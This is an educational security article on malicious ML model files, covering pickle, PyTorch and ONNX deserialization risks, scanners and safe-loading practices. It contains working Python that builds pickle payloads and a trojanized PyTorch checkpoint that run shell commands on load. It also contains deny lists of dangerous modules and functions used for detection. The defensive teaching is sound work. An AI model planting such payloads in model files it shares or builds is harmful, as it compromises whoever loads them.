Model Serialization Attacks
Pickle, SafeTensors, and ONNX deserialization attacks targeting ML model files for arbitrary code execution.
Overview
Model serialization — the process of saving trained model weights and architecture to disk — is one of the most dangerous attack surfaces in the ML ecosystem. The dominant serialization format for PyTorch models uses Python's pickle module, which is fundamentally insecure: loading a pickle file can execute arbitrary Python code. This means that downloading and loading a model from an untrusted source is equivalent to downloading and running an executable from that source.
This vulnerability is not theoretical. Researchers have repeatedly demonstrated malicious model files on Hugging Face Hub and other model repositories. The attack surface is broad because model loading is so routine — data scientists and ML engineers regularly download pre-trained models and fine-tuned checkpoints, often with minimal verification. The widespread culture of sharing models through platforms like Hugging Face has normalized a practice that would be considered reckless in traditional software engineering.
This article covers the mechanics of serialization attacks across formats (pickle, ONNX, TensorRT), demonstrates how to craft and detect malicious model files, and provides safe loading practices. The attacks map to MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and are addressed by OWASP LLM Top 10 2025 LLM04 (Data and Model Poisoning).
Python Pickle: The Root Vulnerability
How Pickle Works
Python's pickle module serializes Python objects by recording the instructions needed to reconstruct them. When unpickling, these instructions are executed by a virtual machine. The critical security issue is that pickle's instruction set includes the REDUCE opcode, which calls an arbitrary callable with arbitrary arguments. This is by design — pickle needs to reconstruct complex objects — but it means that a crafted pickle file can invoke os.system, subprocess.Popen, or any other Python function.
import pickle
import io
import struct
class PickleExploit:
"""
Demonstrate how pickle deserialization enables code execution.
FOR EDUCATIONAL PURPOSES ONLY — use in controlled environments.
"""
@staticmethod
def create_malicious_pickle(command: str) -> bytes:
"""
Create a pickle payload that executes a shell command on load.
This demonstrates why pickle is fundamentally unsafe for untrusted data.
"""
# The __reduce__ method tells pickle how to reconstruct the object.
# By returning (os.system, (command,)), we instruct the unpickler
# to call os.system(command) when loading.
import os
class Exploit:
def __reduce__(self):
return (os.system, (command,))
return pickle.dumps(Exploit())
@staticmethod
def create_stealthy_payload(command: str, legitimate_data: dict) -> bytes:
"""
Create a payload that executes code AND returns legitimate-looking data.
This is harder to detect because the model appears to load correctly.
"""
# This payload first executes the command, then returns normal data
class StealthExploit:
def __init__(self, data):
self.data = data
def __reduce__(self):
# Use exec() to run code, then return the legitimate data
return (
eval,
(
f"__import__('os').system('{command}') and None or {repr(self.data)}",
),
)
return pickle.dumps(StealthExploit(legitimate_data))PyTorch Model Files
PyTorch's torch.save() uses pickle by default. A malicious PyTorch model file (.pt, .pth, or .bin) can execute arbitrary code when loaded with torch.load():
import torch
import torch.nn as nn
from typing import Dict, Any
import os
class MaliciousModelDemo:
"""
Demonstrate malicious PyTorch model file creation.
FOR EDUCATIONAL PURPOSES IN CONTROLLED ENVIRONMENTS ONLY.
"""
@staticmethod
def create_backdoored_model(
legitimate_model: nn.Module,
payload_command: str,
output_path: str,
) -> None:
"""
Save a model that executes a payload when loaded.
The model functions normally after loading — the payload is stealthy.
"""
class TrojanizedState(dict):
"""A dict subclass that executes code when unpickled."""
def __init__(self, state_dict: dict, command: str):
super().__init__(state_dict)
self._command = command
def __reduce__(self):
# When unpickled:
# 1. Execute the payload
# 2. Return a normal dict (so the model loads correctly)
return (
_reconstruct_with_payload,
(dict(self), self._command),
)
state = TrojanizedState(legitimate_model.state_dict(), payload_command)
torch.save(state, output_path)
def _reconstruct_with_payload(state_dict: dict, command: str) -> dict:
"""Helper function used during deserialization."""
os.system(command)
return state_dict
class SafeModelLoader:
"""Load PyTorch models with safety checks."""
@staticmethod
def load_with_weights_only(path: str, map_location: str = "cpu") -> Dict:
"""
Load a model using weights_only=True (PyTorch 2.0+).
This restricts unpickling to tensor data only.
"""
try:
state_dict = torch.load(
path,
map_location=map_location,
weights_only=True, # Critical security flag
)
return {"success": True, "state_dict": state_dict}
except Exception as e:
return {
"success": False,
"error": str(e),
"detail": "Model file may contain non-tensor data (potential exploit)",
}
@staticmethod
def scan_pickle_for_dangerous_ops(file_path: str) -> list:
"""
Scan a pickle file for potentially dangerous operations
WITHOUT executing them.
"""
import pickletools
findings = []
dangerous_modules = {
"os", "subprocess", "sys", "shutil", "builtins",
"importlib", "ctypes", "socket", "http", "urllib",
"requests", "pathlib", "tempfile", "webbrowser",
}
dangerous_functions = {
"system", "popen", "exec", "eval", "execfile",
"compile", "__import__", "getattr", "setattr",
"globals", "locals", "open", "input",
}
try:
with open(file_path, "rb") as f:
data = f.read()
# Use pickletools to disassemble without executing
ops = []
for opcode, arg, pos in pickletools.genops(data):
ops.append((opcode.name, arg, pos))
if opcode.name in ("GLOBAL", "INST", "STACK_GLOBAL"):
if arg and isinstance(arg, str):
module = arg.split(".")[0] if "." in arg else arg.split("\n")[0]
func = arg.split(".")[-1] if "." in arg else arg.split("\n")[-1] if "\n" in arg else ""
if module in dangerous_modules or func in dangerous_functions:
findings.append({
"severity": "critical",
"position": pos,
"opcode": opcode.name,
"reference": arg,
"finding": f"Dangerous reference: {arg}",
})
elif opcode.name == "REDUCE":
findings.append({
"severity": "medium",
"position": pos,
"opcode": "REDUCE",
"finding": "REDUCE opcode found — triggers function call during unpickling",
})
except Exception as e:
findings.append({
"severity": "error",
"finding": f"Failed to analyze pickle file: {e}",
})
return findingsSafeTensors: The Secure Alternative
SafeTensors is a serialization format developed by Hugging Face specifically to address the security problems of pickle. It stores only tensor data — shapes, dtypes, and raw numeric data — with no mechanism for embedding executable code.
SafeTensors Architecture
The format is simple:
- An 8-byte header size (little-endian uint64)
- A JSON header describing tensor names, shapes, dtypes, and byte offsets
- Raw tensor data in contiguous byte arrays
There is no code, no object reconstruction, no callable invocation — just data.
from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
class SafeTensorsManager:
"""Manage model weights using the SafeTensors format."""
@staticmethod
def convert_pytorch_to_safetensors(
pytorch_path: str,
safetensors_path: str,
) -> Dict:
"""Convert a PyTorch model file to SafeTensors format."""
# Load with weights_only=True for safety during conversion
state_dict = torch.load(
pytorch_path, map_location="cpu", weights_only=True
)
# Ensure all values are tensors
tensor_dict = {}
for key, value in state_dict.items():
if isinstance(value, torch.Tensor):
tensor_dict[key] = value
else:
print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
save_file(tensor_dict, safetensors_path)
return {
"input": pytorch_path,
"output": safetensors_path,
"tensors_saved": len(tensor_dict),
"tensors_skipped": len(state_dict) - len(tensor_dict),
}
@staticmethod
def verify_safetensors_integrity(file_path: str) -> Dict:
"""Verify a SafeTensors file's integrity and inspect its contents."""
path = Path(file_path)
result = {
"file": file_path,
"size_bytes": path.stat().st_size,
"format_valid": False,
"tensors": [],
}
try:
with safe_open(file_path, framework="pt", device="cpu") as f:
keys = f.keys()
for key in keys:
tensor = f.get_tensor(key)
result["tensors"].append({
"name": key,
"shape": list(tensor.shape),
"dtype": str(tensor.dtype),
})
result["format_valid"] = True
result["tensor_count"] = len(keys)
except Exception as e:
result["error"] = str(e)
return resultLimitations of SafeTensors
SafeTensors is not a complete model format — it stores only tensors, not the model architecture, optimizer state, or training configuration. This means:
- Model architecture must be defined in code and the SafeTensors file provides only the weights
- Custom objects (learning rate schedules, custom layers) cannot be serialized
- Some Hugging Face models still ship pickle files alongside SafeTensors for backwards compatibility
ONNX Security Considerations
ONNX (Open Neural Network Exchange) is an open format for ML models that uses Protocol Buffers serialization. It is safer than pickle because it uses a defined schema rather than arbitrary code execution. However, ONNX has its own security concerns:
Custom Operators
ONNX supports custom operators that can load and execute shared libraries:
from typing import Dict, List
from pathlib import Path
class ONNXSecurityScanner:
"""Scan ONNX models for security issues."""
def scan_model(self, model_path: str) -> List[Dict]:
"""Scan an ONNX model for security concerns."""
import onnx
findings = []
model = onnx.load(model_path)
# Check for custom operators (could load arbitrary shared libraries)
for node in model.graph.node:
if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
findings.append({
"severity": "high",
"finding": f"Custom operator domain: {node.domain}",
"operator": node.op_type,
"detail": "Custom operators may load arbitrary native code",
})
# Check for external data references
for initializer in model.graph.initializer:
if initializer.data_location == 1: # External data
external_path = ""
for entry in initializer.external_data:
if entry.key == "location":
external_path = entry.value
findings.append({
"severity": "medium",
"finding": f"External data reference: {external_path}",
"detail": "External data could point to a malicious file path",
})
# Check model metadata for suspicious content
for prop in model.metadata_props:
if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
findings.append({
"severity": "medium",
"finding": f"Suspicious metadata: {prop.key}",
"value_preview": prop.value[:100],
})
# Check model size vs parameter count (anomalously large models may contain embedded data)
file_size = Path(model_path).stat().st_size
param_count = sum(
1
for _ in model.graph.initializer
)
if param_count > 0:
bytes_per_param = file_size / param_count
if bytes_per_param > 1000: # Unusually large
findings.append({
"severity": "low",
"finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
"detail": "Model file may contain embedded non-model data",
})
return findingsModel File Scanning Pipeline
Automated Scanning in CI/CD
Integrate model file scanning into your ML pipeline's CI/CD:
import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
class ModelFileScanner:
"""Comprehensive model file security scanner for CI/CD pipelines."""
SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
def __init__(self, policy: str = "strict"):
"""
Args:
policy: 'strict' blocks all unsafe formats,
'warn' logs warnings but allows loading
"""
self.policy = policy
def scan_directory(self, directory: str) -> Dict:
"""Scan a directory of model files for security issues."""
path = Path(directory)
results = {
"scan_time": datetime.now(timezone.utc).isoformat(),
"directory": directory,
"policy": self.policy,
"files_scanned": 0,
"findings": [],
"blocked": [],
"safe_files": [],
}
for file_path in path.rglob("*"):
if not file_path.is_file():
continue
results["files_scanned"] += 1
suffix = file_path.suffix.lower()
if suffix in self.UNSAFE_FORMATS:
finding = {
"file": str(file_path),
"format": suffix,
"severity": "high",
"finding": f"Unsafe serialization format: {suffix}",
}
# Deep scan pickle-based files
if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
try:
pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
str(file_path)
)
if pickle_findings:
finding["pickle_analysis"] = pickle_findings
finding["severity"] = "critical"
except Exception as e:
finding["scan_error"] = str(e)
results["findings"].append(finding)
if self.policy == "strict":
results["blocked"].append(str(file_path))
elif suffix in self.SAFE_FORMATS:
results["safe_files"].append(str(file_path))
results["pass"] = len(results["blocked"]) == 0
return results
def generate_manifest(self, directory: str) -> Dict[str, str]:
"""Generate a hash manifest for all model files in a directory."""
path = Path(directory)
manifest = {}
for file_path in sorted(path.rglob("*")):
if file_path.is_file():
sha256 = hashlib.sha256()
with open(file_path, "rb") as f:
for chunk in iter(lambda: f.read(8192), b""):
sha256.update(chunk)
relative = str(file_path.relative_to(path))
manifest[relative] = sha256.hexdigest()
return manifestScanning with Existing Tools
Several tools can scan model files for malicious content:
#!/bin/bash
# Model file security scanning pipeline
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
echo "Usage: $0 <model_directory>"
exit 1
fi
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while read f; do
echo " CRITICAL: Pickle file found: $f"
done
find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while read f; do
echo " WARNING: PyTorch file (may use pickle): $f"
done
find "$MODEL_DIR" -type f -name "*.safetensors" | while read f; do
echo " OK: SafeTensors file: $f"
done
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while read f; do
echo " Analyzing: $f"
fickling --check-safety "$f" 2>/dev/null || echo " Could not analyze $f"
done
else
echo " fickling not installed. Install with: pip install fickling"
fi
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
modelscan scan -p "$MODEL_DIR"
else
echo " modelscan not installed. Install with: pip install modelscan"
fi
echo ""
echo "=== Scan Complete ==="The tools referenced above are real:
- fickling (Trail of Bits): Static analysis of pickle files without executing them. https://github.com/trailofbits/fickling
- modelscan (Protect AI): Scans model files for unsafe operations across formats. https://github.com/protectai/modelscan
Format Comparison
| Format | Code Execution Risk | Ecosystem Support | Performance | Recommended |
|---|---|---|---|---|
| Pickle (.pkl) | Critical — arbitrary code execution | Universal Python | Fast | Never for untrusted sources |
| PyTorch (.pt/.pth) | High — uses pickle internally | PyTorch ecosystem | Fast | Use weights_only=True |
| SafeTensors | None — data only | Hugging Face, growing | Fast | Yes — preferred format |
| ONNX (.onnx) | Low — custom ops can load code | Cross-framework | Good | Yes, with custom op review |
| TensorRT (.plan) | Low — engine format | NVIDIA inference | Fastest | Yes, for NVIDIA deployment |
| TFLite (.tflite) | Low — flatbuffers format | Mobile/edge | Good | Yes, for edge deployment |
Defensive Recommendations
- Use SafeTensors as the default serialization format for all new models
- Always use
weights_only=Truewhen loading PyTorch models withtorch.load() - Scan all model files in CI/CD pipelines before deployment using fickling or modelscan
- Never load pickle files from untrusted sources — treat them as executables
- Convert existing pickle models to SafeTensors format and deprecate the pickle versions
- Verify model file hashes against a trusted manifest before loading
- Restrict model download sources to approved registries with verified publishers
- Monitor Hugging Face models for post-upload modifications (use commit hashes, not branch refs)
References
- Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
- Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
- Hugging Face SafeTensors — https://github.com/huggingface/safetensors
- MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
- OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
- Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
- PyTorch
weights_onlydocumentation — https://pytorch.org/docs/stable/generated/torch.load.html